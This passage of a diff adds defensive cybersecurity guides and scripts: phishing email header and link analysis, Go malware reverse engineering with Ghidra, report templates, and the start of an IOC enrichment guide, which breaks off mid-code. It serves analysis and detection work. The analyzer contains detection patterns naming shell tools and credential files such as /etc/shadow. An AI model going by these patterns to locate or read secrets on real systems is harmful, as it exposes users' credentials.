# Check if sending IP is in known malicious IP lists
|
||||
# Query AbuseIPDB or VirusTotal
|
||||
curl -s "https://api.abuseipdb.com/api/v2/check?ipAddress=${SENDING_IP}" \
|
||||
-H "Key: YOUR_API_KEY" -H "Accept: application/json" | python3 -m json.tool
|
||||
```
|
||||
|
||||
### Step 4: Analyze Sender Domain and Infrastructure
|
||||
|
||||
```bash
|
||||
# WHOIS lookup on sender domain
|
||||
whois $SENDER_DOMAIN | grep -iE '(registrar|creation|expiration|registrant|nameserver)'
|
||||
|
||||
# Check domain age (recently registered domains are suspicious)
|
||||
# DNS record investigation
|
||||
dig A $SENDER_DOMAIN +short
|
||||
dig MX $SENDER_DOMAIN +short
|
||||
dig NS $SENDER_DOMAIN +short
|
||||
|
||||
# Reverse DNS on sending IP
|
||||
dig -x $SENDING_IP +short
|
||||
|
||||
# Check for lookalike/typosquatting domains
|
||||
# Compare with legitimate domain using visual similarity
|
||||
python3 << 'PYEOF'
|
||||
import Levenshtein # pip install python-Levenshtein
|
||||
|
||||
legitimate = "microsoft.com"
|
||||
suspicious = "micr0soft.com"
|
||||
|
||||
distance = Levenshtein.distance(legitimate, suspicious)
|
||||
ratio = Levenshtein.ratio(legitimate, suspicious)
|
||||
print(f"Edit distance: {distance}")
|
||||
print(f"Similarity ratio: {ratio:.2%}")
|
||||
if ratio > 0.8:
|
||||
print("WARNING: Likely typosquatting/lookalike domain!")
|
||||
PYEOF
|
||||
|
||||
# Check domain reputation on VirusTotal
|
||||
curl -s "https://www.virustotal.com/api/v3/domains/${SENDER_DOMAIN}" \
|
||||
-H "x-apikey: YOUR_VT_API_KEY" | python3 -m json.tool
|
||||
|
||||
# Check if the Reply-To differs from From (common phishing indicator)
|
||||
python3 -c "
|
||||
import email
|
||||
with open('/cases/case-2024-001/email/phishing_email.eml') as f:
|
||||
msg = email.message_from_file(f)
|
||||
from_addr = email.utils.parseaddr(msg['From'])[1]
|
||||
reply_to = email.utils.parseaddr(msg.get('Reply-To', msg['From']))[1]
|
||||
if from_addr != reply_to:
|
||||
print(f'WARNING: From ({from_addr}) != Reply-To ({reply_to})')
|
||||
else:
|
||||
print('From and Reply-To match')
|
||||
"
|
||||
```
|
||||
|
||||
### Step 5: Examine Email Body and Attachments
|
||||
|
||||
```bash
|
||||
# Extract URLs from email body
|
||||
python3 << 'PYEOF'
|
||||
import email
|
||||
import re
|
||||
from email import policy
|
||||
|
||||
with open('/cases/case-2024-001/email/phishing_email.eml', 'r') as f:
|
||||
msg = email.message_from_file(f, policy=policy.default)
|
||||
|
||||
body = msg.get_body(preferencelist=('html', 'plain'))
|
||||
if body:
|
||||
content = body.get_content()
|
||||
urls = re.findall(r'https?://[^\s<>"\']+', content)
|
||||
print("=== URLs FOUND IN EMAIL BODY ===")
|
||||
for url in set(urls):
|
||||
print(f" {url}")
|
||||
|
||||
# Check for URL obfuscation (display text != href)
|
||||
href_pattern = re.findall(r'<a[^>]*href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', content, re.DOTALL)
|
||||
print("\n=== HYPERLINK ANALYSIS ===")
|
||||
for href, text in href_pattern:
|
||||
display_url = re.findall(r'https?://[^\s<]+', text)
|
||||
if display_url and display_url[0] != href:
|
||||
print(f" MISMATCH: Display='{display_url[0]}' -> Actual='{href}'")
|
||||
|
||||
# Extract and hash attachments
|
||||
print("\n=== ATTACHMENTS ===")
|
||||
for part in msg.walk():
|
||||
if part.get_content_disposition() == 'attachment':
|
||||
filename = part.get_filename()
|
||||
content = part.get_payload(decode=True)
|
||||
import hashlib
|
||||
sha256 = hashlib.sha256(content).hexdigest()
|
||||
print(f" File: {filename}, Size: {len(content)}, SHA-256: {sha256}")
|
||||
with open(f'/cases/case-2024-001/email/attachments/{filename}', 'wb') as af:
|
||||
af.write(content)
|
||||
PYEOF
|
||||
|
||||
# Submit attachment hashes to VirusTotal
|
||||
# Submit URLs to URLhaus or PhishTank for reputation check
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| SPF (Sender Policy Framework) | DNS record specifying authorized mail servers for a domain |
|
||||
| DKIM (DomainKeys Identified Mail) | Cryptographic signature verifying email content integrity |
|
||||
| DMARC | Policy framework combining SPF and DKIM for sender authentication |
|
||||
| Received headers | Server-added headers showing each hop in the delivery chain (read bottom to top) |
|
||||
| Return-Path | Envelope sender address used for bounce messages; may differ from From |
|
||||
| Message-ID | Unique identifier assigned by the originating mail server |
|
||||
| X-Originating-IP | Original sender IP address (added by some mail services) |
|
||||
| Header forgery | Attackers can forge From, Reply-To, and other headers but not Received chains |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| MXToolbox | Online email header analyzer and DNS lookup |
|
||||
| dig/nslookup | DNS record queries for SPF, DKIM, DMARC verification |
|
||||
| pyspf | Python SPF record validation library |
|
||||
| dkimpy | Python DKIM signature verification library |
|
||||
| PhishTool | Specialized phishing email analysis platform |
|
||||
| VirusTotal | URL and file reputation checking service |
|
||||
| AbuseIPDB | IP address reputation database |
|
||||
| whois | Domain registration information lookup |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: CEO Fraud / Business Email Compromise**
|
||||
The email claims to be from the CEO but Reply-To points to a Gmail address, SPF fails because the sending IP is not authorized for the spoofed domain, DKIM is missing, and the From domain is a lookalike (ceo-company.com vs company.com).
|
||||
|
||||
**Scenario 2: Credential Harvesting Phishing**
|
||||
Email contains a link that displays "login.microsoft.com" but href points to a lookalike domain, the attachment is an HTML file containing a fake login page with credential exfiltration JavaScript, the sending domain was registered 3 days ago.
|
||||
|
||||
**Scenario 3: Malware Delivery via Attachment**
|
||||
Email with an Office document attachment containing macros, the sender domain passes SPF but the account was compromised, DKIM signature is valid (sent from legitimate infrastructure), attachment SHA-256 matches known malware on VirusTotal.
|
||||
|
||||
**Scenario 4: Spear Phishing with Legitimate Service**
|
||||
Attacker uses a legitimate email marketing service to send phishing, SPF and DKIM pass because the service is authorized, the phishing is in the content not the infrastructure, requires URL and content analysis rather than header authentication checks.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Email Header Analysis Report:
|
||||
Subject: "Urgent: Invoice Payment Required"
|
||||
From: accounting@examp1e-corp.com (SPOOFED)
|
||||
Reply-To: payments.urgent@gmail.com (MISMATCH)
|
||||
Return-Path: <bounce@mail-server.xyz>
|
||||
Date: 2024-01-15 09:23:45 UTC
|
||||
|
||||
Delivery Path (4 hops):
|
||||
Hop 1: mail-server.xyz [203.0.113.45] -> relay1.isp.com
|
||||
Hop 2: relay1.isp.com -> mx.target-company.com
|
||||
Hop 3: mx.target-company.com -> internal-filter.target.com
|
||||
Hop 4: internal-filter.target.com -> mailbox
|
||||
|
||||
Authentication:
|
||||
SPF: FAIL (203.0.113.45 not authorized for examp1e-corp.com)
|
||||
DKIM: NONE (no signature present)
|
||||
DMARC: FAIL (p=none, no enforcement)
|
||||
|
||||
Indicators of Phishing:
|
||||
- Lookalike domain (examp1e-corp.com vs example-corp.com, 96% similar)
|
||||
- From/Reply-To mismatch
|
||||
- Domain registered 2 days before email sent
|
||||
- URL in body points to credential harvesting page
|
||||
- Attachment: invoice.xlsm (SHA-256: a3f2...) - Known malware on VT
|
||||
|
||||
Risk Level: HIGH
|
||||
```
|
||||
@@ -0,0 +1,290 @@
|
||||
---
|
||||
name: analyzing-golang-malware-with-ghidra
|
||||
description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction, and type reconstruction in stripped Go binaries.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [golang, ghidra, reverse-engineering, malware-analysis, binary-analysis, go-malware, disassembly]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Golang Malware with Ghidra
|
||||
|
||||
## Overview
|
||||
|
||||
Go (Golang) has become a popular language for malware authors due to its cross-compilation capabilities, static linking that produces self-contained binaries, and the complexity it introduces for reverse engineering. Go binaries contain the entire runtime, standard library, and all dependencies statically linked, resulting in large binaries (often 5-15MB) with thousands of functions. Ghidra struggles with Go-specific string formats (non-null-terminated), stripped function names, and goroutine concurrency patterns. Specialized tools like GoResolver (Volexity, 2025) use control-flow graph similarity to automatically deobfuscate and recover function names in stripped or obfuscated Go binaries.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra 11.0+ with JDK 17+
|
||||
- GoResolver plugin (for function name recovery)
|
||||
- Go Reverse Engineering Tool Kit (go-re.tk)
|
||||
- Python 3.9+ for helper scripts
|
||||
- Understanding of Go runtime internals (goroutines, channels, interfaces)
|
||||
- Familiarity with Go binary structure (pclntab, moduledata, itab)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Go Binary Structure
|
||||
|
||||
Go binaries embed rich metadata in the `pclntab` (PC Line Table) structure, which maps program counters to function names, source files, and line numbers. Even stripped binaries retain this metadata. The `moduledata` structure contains pointers to type information, itabs (interface tables), and the pclntab itself. Go strings are stored as a pointer-length pair rather than null-terminated C strings.
|
||||
|
||||
### Function Recovery in Stripped Binaries
|
||||
|
||||
Despite stripping symbol tables, Go binaries retain function names within the pclntab. However, obfuscation tools like garble rename functions to random strings. GoResolver addresses this by computing control-flow graph signatures of obfuscated functions and matching them against a database of known Go standard library and third-party package functions.
|
||||
|
||||
### Crate/Dependency Extraction
|
||||
|
||||
Go's dependency management embeds module paths and version strings in the binary. Extracting these reveals the malware's third-party dependencies (HTTP libraries, encryption packages, C2 frameworks), which provides insight into capabilities without full reverse engineering.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Initial Binary Analysis
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Analyze Go binary metadata for malware analysis."""
|
||||
import struct
|
||||
import sys
|
||||
import re
|
||||
|
||||
|
||||
def find_go_build_info(data):
|
||||
"""Extract Go build information from binary."""
|
||||
# Go buildinfo magic: \xff Go buildinf:
|
||||
magic = b'\xff Go buildinf:'
|
||||
offset = data.find(magic)
|
||||
if offset == -1:
|
||||
return None
|
||||
|
||||
print(f"[+] Go build info at offset 0x{offset:x}")
|
||||
|
||||
# Extract Go version string nearby
|
||||
go_version = re.search(rb'go\d+\.\d+(?:\.\d+)?', data[offset:offset+256])
|
||||
if go_version:
|
||||
print(f" Go Version: {go_version.group().decode()}")
|
||||
|
||||
return offset
|
||||
|
||||
|
||||
def find_pclntab(data):
|
||||
"""Locate the pclntab (PC Line Table) structure."""
|
||||
# pclntab magic bytes vary by Go version
|
||||
magics = {
|
||||
b'\xfb\xff\xff\xff\x00\x00': "Go 1.2-1.15",
|
||||
b'\xfa\xff\xff\xff\x00\x00': "Go 1.16-1.17",
|
||||
b'\xf1\xff\xff\xff\x00\x00': "Go 1.18-1.19",
|
||||
b'\xf0\xff\xff\xff\x00\x00': "Go 1.20+",
|
||||
}
|
||||
|
||||
for magic, version in magics.items():
|
||||
offset = data.find(magic)
|
||||
if offset != -1:
|
||||
print(f"[+] pclntab found at 0x{offset:x} ({version})")
|
||||
return offset, version
|
||||
|
||||
return None, None
|
||||
|
||||
|
||||
def extract_function_names(data, pclntab_offset):
|
||||
"""Extract function names from pclntab."""
|
||||
if pclntab_offset is None:
|
||||
return []
|
||||
|
||||
functions = []
|
||||
# Function name strings follow specific patterns
|
||||
func_pattern = re.compile(
|
||||
rb'(?:main|runtime|fmt|net|os|crypto|encoding|io|sync|'
|
||||
rb'syscall|reflect|strings|bytes|path|time|math|sort|'
|
||||
rb'github\.com|golang\.org)[/\.][\w/.]+',
|
||||
)
|
||||
|
||||
for match in func_pattern.finditer(data):
|
||||
name = match.group().decode('utf-8', errors='replace')
|
||||
if len(name) > 4 and len(name) < 200:
|
||||
functions.append(name)
|
||||
|
||||
return sorted(set(functions))
|
||||
|
||||
|
||||
def extract_go_strings(data):
|
||||
"""Extract Go-style strings (pointer+length pairs)."""
|
||||
# Go strings are not null-terminated; extract readable sequences
|
||||
strings = []
|
||||
ascii_pattern = re.compile(rb'[\x20-\x7e]{10,}')
|
||||
|
||||
for match in ascii_pattern.finditer(data):
|
||||
s = match.group().decode('ascii')
|
||||
# Filter for interesting malware strings
|
||||
interesting = [
|
||||
'http', 'https', 'tcp', 'udp', 'dns',
|
||||
'cmd', 'shell', 'exec', 'upload', 'download',
|
||||
'encrypt', 'decrypt', 'key', 'token', 'password',
|
||||
'c2', 'beacon', 'agent', 'implant', 'bot',
|
||||
'mutex', 'persist', 'registry', 'scheduled',
|
||||
]
|
||||
if any(kw in s.lower() for kw in interesting):
|
||||
strings.append(s)
|
||||
|
||||
return strings
|
||||
|
||||
|
||||
def extract_dependencies(data):
|
||||
"""Extract Go module dependencies from binary."""
|
||||
deps = []
|
||||
# Module paths follow pattern: github.com/user/repo
|
||||
dep_pattern = re.compile(
|
||||
rb'((?:github\.com|gitlab\.com|golang\.org|gopkg\.in|'
|
||||
rb'go\.etcd\.io|google\.golang\.org)/[^\x00\s]{5,80})'
|
||||
)
|
||||
|
||||
for match in dep_pattern.finditer(data):
|
||||
dep = match.group().decode('utf-8', errors='replace')
|
||||
deps.append(dep)
|
||||
|
||||
unique_deps = sorted(set(deps))
|
||||
return unique_deps
|
||||
|
||||
|
||||
def analyze_go_binary(filepath):
|
||||
"""Full analysis of Go malware binary."""
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
print(f"[+] Analyzing Go binary: {filepath}")
|
||||
print(f" File size: {len(data):,} bytes")
|
||||
print("=" * 60)
|
||||
|
||||
# Build info
|
||||
find_go_build_info(data)
|
||||
|
||||
# pclntab
|
||||
pclntab_offset, go_version = find_pclntab(data)
|
||||
|
||||
# Functions
|
||||
functions = extract_function_names(data, pclntab_offset)
|
||||
print(f"\n[+] Recovered {len(functions)} function names")
|
||||
|
||||
# Categorize functions
|
||||
categories = {
|
||||
"network": [], "crypto": [], "os_exec": [],
|
||||
"file_io": [], "main": [], "third_party": [],
|
||||
}
|
||||
for f in functions:
|
||||
if 'net/' in f or 'http' in f.lower():
|
||||
categories["network"].append(f)
|
||||
elif 'crypto' in f:
|
||||
categories["crypto"].append(f)
|
||||
elif 'os/exec' in f or 'syscall' in f:
|
||||
categories["os_exec"].append(f)
|
||||
elif 'os.' in f or 'io/' in f:
|
||||
categories["file_io"].append(f)
|
||||
elif f.startswith('main.'):
|
||||
categories["main"].append(f)
|
||||
elif 'github.com' in f or 'golang.org' in f:
|
||||
categories["third_party"].append(f)
|
||||
|
||||
for cat, funcs in categories.items():
|
||||
if funcs:
|
||||
print(f"\n [{cat}] ({len(funcs)} functions):")
|
||||
for fn in funcs[:10]:
|
||||
print(f" {fn}")
|
||||
|
||||
# Dependencies
|
||||
deps = extract_dependencies(data)
|
||||
print(f"\n[+] Dependencies ({len(deps)}):")
|
||||
for dep in deps[:20]:
|
||||
print(f" {dep}")
|
||||
|
||||
# Suspicious strings
|
||||
sus_strings = extract_go_strings(data)
|
||||
print(f"\n[+] Suspicious strings ({len(sus_strings)}):")
|
||||
for s in sus_strings[:20]:
|
||||
print(f" {s}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <go_binary>")
|
||||
sys.exit(1)
|
||||
analyze_go_binary(sys.argv[1])
|
||||
```
|
||||
|
||||
### Step 2: Ghidra Analysis Script
|
||||
|
||||
```python
|
||||
# Ghidra script (run within Ghidra's script manager)
|
||||
# Save as AnalyzeGoBinary.py in Ghidra scripts directory
|
||||
|
||||
# @category MalwareAnalysis
|
||||
# @description Analyze Go binary structure and recover metadata
|
||||
|
||||
def analyze_go_binary_ghidra():
|
||||
"""Ghidra script for Go binary analysis."""
|
||||
from ghidra.program.model.mem import MemoryAccessException
|
||||
|
||||
program = getCurrentProgram()
|
||||
memory = program.getMemory()
|
||||
listing = program.getListing()
|
||||
|
||||
print("[+] Go Binary Analysis Script")
|
||||
print(f" Program: {program.getName()}")
|
||||
|
||||
# Find pclntab
|
||||
pclntab_magics = [
|
||||
bytes([0xf0, 0xff, 0xff, 0xff]), # Go 1.20+
|
||||
bytes([0xf1, 0xff, 0xff, 0xff]), # Go 1.18-1.19
|
||||
bytes([0xfa, 0xff, 0xff, 0xff]), # Go 1.16-1.17
|
||||
bytes([0xfb, 0xff, 0xff, 0xff]), # Go 1.2-1.15
|
||||
]
|
||||
|
||||
for magic in pclntab_magics:
|
||||
addr = memory.findBytes(
|
||||
program.getMinAddress(), magic, None, True, None
|
||||
)
|
||||
if addr:
|
||||
print(f"[+] pclntab found at {addr}")
|
||||
# Create label
|
||||
program.getSymbolTable().createLabel(
|
||||
addr, "go_pclntab", None,
|
||||
ghidra.program.model.symbol.SourceType.ANALYSIS
|
||||
)
|
||||
break
|
||||
|
||||
# Fix Go string definitions
|
||||
# Go strings are ptr+len, not null terminated
|
||||
print("[+] Fixing Go string references...")
|
||||
|
||||
# Search for function names containing package paths
|
||||
symbol_table = program.getSymbolTable()
|
||||
func_count = 0
|
||||
for symbol in symbol_table.getAllSymbols(True):
|
||||
name = symbol.getName()
|
||||
if ('.' in name and
|
||||
any(pkg in name for pkg in
|
||||
['main.', 'runtime.', 'net.', 'crypto.', 'os.'])):
|
||||
func_count += 1
|
||||
|
||||
print(f"[+] Found {func_count} Go function symbols")
|
||||
|
||||
|
||||
# Execute
|
||||
analyze_go_binary_ghidra()
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Go version and build information extracted from binary
|
||||
- pclntab located and parsed for function name recovery
|
||||
- Third-party dependencies identified revealing malware capabilities
|
||||
- Main package functions enumerated for targeted analysis
|
||||
- Network, crypto, and OS exec functions categorized
|
||||
- Ghidra analysis correctly labels Go runtime structures
|
||||
|
||||
## References
|
||||
|
||||
- [CUJO AI - Reverse Engineering Go Binaries with Ghidra](https://cujo.com/blog/reverse-engineering-go-binaries-with-ghidra/)
|
||||
- [Volexity GoResolver](https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/)
|
||||
- [Go Reverse Engineering Tool Kit](https://go-re.tk/about/)
|
||||
- [SentinelOne AlphaGolang](https://www.sentinelone.com/labs/alphagolang-a-step-by-step-go-malware-reversing-methodology-for-ida-pro/)
|
||||
- [Go Binary Reversing Notes](https://gist.github.com/0xdevalias/4e430914124c3fd2c51cb7ac2801acba)
|
||||
@@ -0,0 +1,35 @@
|
||||
# Go Malware Analysis Report
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Size | |
|
||||
| Go Version | |
|
||||
| Architecture | amd64 / arm64 / 386 |
|
||||
| Stripped | Yes / No |
|
||||
| Obfuscated | Yes (garble) / No |
|
||||
|
||||
## Recovered Functions
|
||||
| Category | Count | Key Functions |
|
||||
|----------|-------|---------------|
|
||||
| main | | |
|
||||
| networking | | |
|
||||
| crypto | | |
|
||||
| os/exec | | |
|
||||
| third-party | | |
|
||||
|
||||
## Dependencies
|
||||
| Module | Purpose |
|
||||
|--------|---------|
|
||||
| | |
|
||||
|
||||
## C2 Infrastructure
|
||||
| Indicator | Type | Value |
|
||||
|-----------|------|-------|
|
||||
| | URL / IP / Domain | |
|
||||
|
||||
## Recommendations
|
||||
1. Block identified C2 infrastructure
|
||||
2. Create YARA rule for unique Go function signatures
|
||||
3. Monitor for similar Go binary compilation artifacts
|
||||
@@ -0,0 +1,29 @@
|
||||
# Go Binary Analysis Standards
|
||||
|
||||
## Go Binary Structure
|
||||
| Component | Description | Location |
|
||||
|-----------|-------------|----------|
|
||||
| pclntab | PC-to-function mapping table | .gopclntab or .text |
|
||||
| moduledata | Runtime metadata structure | .noptrdata |
|
||||
| itab | Interface method tables | .rodata |
|
||||
| buildinfo | Go version and module info | .go.buildinfo |
|
||||
| typelinks | Type descriptor table | .rodata |
|
||||
|
||||
## pclntab Magic Bytes by Go Version
|
||||
| Magic | Go Version |
|
||||
|-------|-----------|
|
||||
| 0xFBFFFFFF | 1.2 - 1.15 |
|
||||
| 0xFAFFFFFF | 1.16 - 1.17 |
|
||||
| 0xF1FFFFFF | 1.18 - 1.19 |
|
||||
| 0xF0FFFFFF | 1.20+ |
|
||||
|
||||
## Common Go Malware Families
|
||||
- Sliver C2 implant
|
||||
- Geacon (Go Cobalt Strike beacon)
|
||||
- GoBruteforcer
|
||||
- Kaiji botnet
|
||||
- Chaos botnet (Go-based)
|
||||
|
||||
## References
|
||||
- [Go Runtime Source](https://github.com/golang/go/tree/master/src/runtime)
|
||||
- [Go Internal ABI](https://go.dev/s/regcallabi)
|
||||
@@ -0,0 +1,37 @@
|
||||
# Go Malware Analysis Workflows
|
||||
|
||||
## Workflow 1: Stripped Binary Recovery
|
||||
```
|
||||
[Stripped Go Binary] --> [Find pclntab] --> [Recover Function Names]
|
||||
|
|
||||
v
|
||||
[Apply GoResolver] --> [Deobfuscate Names]
|
||||
|
|
||||
v
|
||||
[Categorize Functions]
|
||||
```
|
||||
|
||||
## Workflow 2: Full Ghidra Analysis
|
||||
```
|
||||
[Go Binary] --> [Import to Ghidra] --> [Run Go Analysis Scripts]
|
||||
|
|
||||
v
|
||||
[Fix String References]
|
||||
|
|
||||
v
|
||||
[Identify main Package]
|
||||
|
|
||||
v
|
||||
[Analyze C2/Network Logic]
|
||||
```
|
||||
|
||||
## Workflow 3: Dependency-Based Capability Assessment
|
||||
```
|
||||
[Go Binary] --> [Extract Module Info] --> [List Dependencies]
|
||||
|
|
||||
v
|
||||
[Map to Capabilities]
|
||||
|
|
||||
v
|
||||
[Prioritize Analysis]
|
||||
```
|
||||
@@ -0,0 +1,162 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Go Malware Binary Analyzer
|
||||
|
||||
Extracts metadata, function names, dependencies, and suspicious
|
||||
indicators from Go-compiled malware binaries.
|
||||
|
||||
Usage:
|
||||
python process.py --file malware.exe --output report.json
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import re
|
||||
import struct
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
PCLNTAB_MAGICS = {
|
||||
b'\xf0\xff\xff\xff': "Go 1.20+",
|
||||
b'\xf1\xff\xff\xff': "Go 1.18-1.19",
|
||||
b'\xfa\xff\xff\xff': "Go 1.16-1.17",
|
||||
b'\xfb\xff\xff\xff': "Go 1.2-1.15",
|
||||
}
|
||||
|
||||
|
||||
def find_pclntab(data):
|
||||
for magic, version in PCLNTAB_MAGICS.items():
|
||||
offset = data.find(magic)
|
||||
if offset != -1:
|
||||
return offset, version
|
||||
return None, None
|
||||
|
||||
|
||||
def extract_go_version(data):
|
||||
match = re.search(rb'go(\d+\.\d+(?:\.\d+)?)', data)
|
||||
return match.group(1).decode() if match else "unknown"
|
||||
|
||||
|
||||
def extract_functions(data):
|
||||
func_pattern = re.compile(
|
||||
rb'((?:main|runtime|fmt|net|os|crypto|encoding|io|sync|'
|
||||
rb'syscall|reflect|strings|bytes|path|time|math|sort|'
|
||||
rb'github\.com|golang\.org|gopkg\.in)[/\.][\w/.]+)'
|
||||
)
|
||||
functions = set()
|
||||
for match in func_pattern.finditer(data):
|
||||
name = match.group(1).decode('utf-8', errors='replace')
|
||||
if 4 < len(name) < 200:
|
||||
functions.add(name)
|
||||
return sorted(functions)
|
||||
|
||||
|
||||
def extract_dependencies(data):
|
||||
dep_pattern = re.compile(
|
||||
rb'((?:github\.com|gitlab\.com|golang\.org|gopkg\.in|'
|
||||
rb'go\.etcd\.io|google\.golang\.org)/[\w./-]{5,80})'
|
||||
)
|
||||
deps = set()
|
||||
for match in dep_pattern.finditer(data):
|
||||
dep = match.group(1).decode('utf-8', errors='replace')
|
||||
# Clean up trailing artifacts
|
||||
dep = dep.rstrip('/.')
|
||||
deps.add(dep)
|
||||
return sorted(deps)
|
||||
|
||||
|
||||
def extract_suspicious_strings(data):
|
||||
interesting_patterns = [
|
||||
rb'https?://[\w./:?&=-]+',
|
||||
rb'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?::\d+)?',
|
||||
rb'(?:cmd|powershell|bash|sh)(?:\.exe)?',
|
||||
rb'(?:HKLM|HKCU)\\[^\x00]+',
|
||||
rb'/etc/(?:passwd|shadow|crontab)',
|
||||
]
|
||||
|
||||
results = {}
|
||||
for pattern in interesting_patterns:
|
||||
matches = re.findall(pattern, data)
|
||||
if matches:
|
||||
decoded = [m.decode('utf-8', errors='replace') for m in matches]
|
||||
results[pattern.decode('utf-8', errors='replace')] = list(set(decoded))
|
||||
|
||||
return results
|
||||
|
||||
|
||||
def categorize_functions(functions):
|
||||
categories = {
|
||||
"main_logic": [],
|
||||
"networking": [],
|
||||
"cryptography": [],
|
||||
"os_execution": [],
|
||||
"file_operations": [],
|
||||
"third_party": [],
|
||||
"runtime": [],
|
||||
}
|
||||
|
||||
for func in functions:
|
||||
fl = func.lower()
|
||||
if func.startswith('main.'):
|
||||
categories["main_logic"].append(func)
|
||||
elif any(x in fl for x in ['net/', 'http', 'tcp', 'udp', 'dns']):
|
||||
categories["networking"].append(func)
|
||||
elif 'crypto' in fl:
|
||||
categories["cryptography"].append(func)
|
||||
elif any(x in fl for x in ['os/exec', 'syscall']):
|
||||
categories["os_execution"].append(func)
|
||||
elif any(x in fl for x in ['os.', 'io/', 'ioutil']):
|
||||
categories["file_operations"].append(func)
|
||||
elif any(x in fl for x in ['github.com', 'golang.org', 'gopkg.in']):
|
||||
categories["third_party"].append(func)
|
||||
elif func.startswith('runtime.'):
|
||||
categories["runtime"].append(func)
|
||||
|
||||
return {k: v for k, v in categories.items() if v}
|
||||
|
||||
|
||||
def analyze(filepath):
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
report = {
|
||||
"file": str(filepath),
|
||||
"size": len(data),
|
||||
"go_version": extract_go_version(data),
|
||||
}
|
||||
|
||||
pclntab_offset, pclntab_version = find_pclntab(data)
|
||||
report["pclntab"] = {
|
||||
"offset": f"0x{pclntab_offset:x}" if pclntab_offset else None,
|
||||
"version": pclntab_version,
|
||||
}
|
||||
|
||||
functions = extract_functions(data)
|
||||
report["total_functions"] = len(functions)
|
||||
report["function_categories"] = categorize_functions(functions)
|
||||
|
||||
report["dependencies"] = extract_dependencies(data)
|
||||
report["suspicious_strings"] = extract_suspicious_strings(data)
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Go Malware Analyzer")
|
||||
parser.add_argument("--file", required=True, help="Go binary to analyze")
|
||||
parser.add_argument("--output", help="Output JSON report")
|
||||
|
||||
args = parser.parse_args()
|
||||
report = analyze(args.file)
|
||||
|
||||
print(json.dumps(report, indent=2))
|
||||
|
||||
if args.output:
|
||||
with open(args.output, 'w') as f:
|
||||
json.dump(report, f, indent=2)
|
||||
print(f"\n[+] Report saved to {args.output}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,148 @@
|
||||
---
|
||||
name: analyzing-indicators-of-compromise
|
||||
description: >
|
||||
Analyzes indicators of compromise (IOCs) including IP addresses, domains, file hashes, URLs,
|
||||
and email artifacts to determine maliciousness confidence, campaign attribution, and blocking
|
||||
priority. Use when triaging IOCs from phishing emails, security alerts, or external threat feeds;
|
||||
enriching raw IOCs with multi-source intelligence; or making block/monitor/whitelist decisions.
|
||||
Activates for requests involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [IOC, VirusTotal, AbuseIPDB, MalwareBazaar, MISP, threat-intelligence, STIX, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Indicators of Compromise
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- A phishing email or alert generates IOCs (URLs, IP addresses, file hashes) requiring rapid triage
|
||||
- Automated feeds deliver bulk IOCs that need confidence scoring before ingestion into blocking controls
|
||||
- An incident investigation requires contextual enrichment of observed network artifacts
|
||||
|
||||
**Do not use** this skill in isolation for high-stakes blocking decisions — always combine automated enrichment with analyst judgment, especially for shared infrastructure (CDNs, cloud providers).
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- VirusTotal API key (free or Enterprise) for multi-AV and sandbox lookup
|
||||
- AbuseIPDB API key for IP reputation checks
|
||||
- MISP instance or TIP for cross-referencing against known campaigns
|
||||
- Python with `requests` and `vt-py` libraries, or SOAR platform with pre-built connectors
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Normalize and Classify IOC Types
|
||||
|
||||
Before enriching, classify each IOC:
|
||||
- **IPv4/IPv6 address**: Check if RFC 1918 private (skip external enrichment), validate format
|
||||
- **Domain/FQDN**: Defang for safe handling (`evil[.]com`), extract registered domain via tldextract
|
||||
- **URL**: Extract domain + path separately; check for redirectors
|
||||
- **File hash**: Identify hash type (MD5/SHA-1/SHA-256); prefer SHA-256 for uniqueness
|
||||
- **Email address**: Split into domain (check MX/DMARC) and local part for pattern analysis
|
||||
|
||||
Defang IOCs in documentation (replace `.` with `[.]` and `://` with `[://]`) to prevent accidental clicks.
|
||||
|
||||
### Step 2: Multi-Source Enrichment
|
||||
|
||||
**VirusTotal (file hash, URL, IP, domain)**:
|
||||
```python
|
||||
import vt
|
||||
|
||||
client = vt.Client("YOUR_VT_API_KEY")
|
||||
|
||||
# File hash lookup
|
||||
file_obj = client.get_object(f"/files/{sha256_hash}")
|
||||
detections = file_obj.last_analysis_stats
|
||||
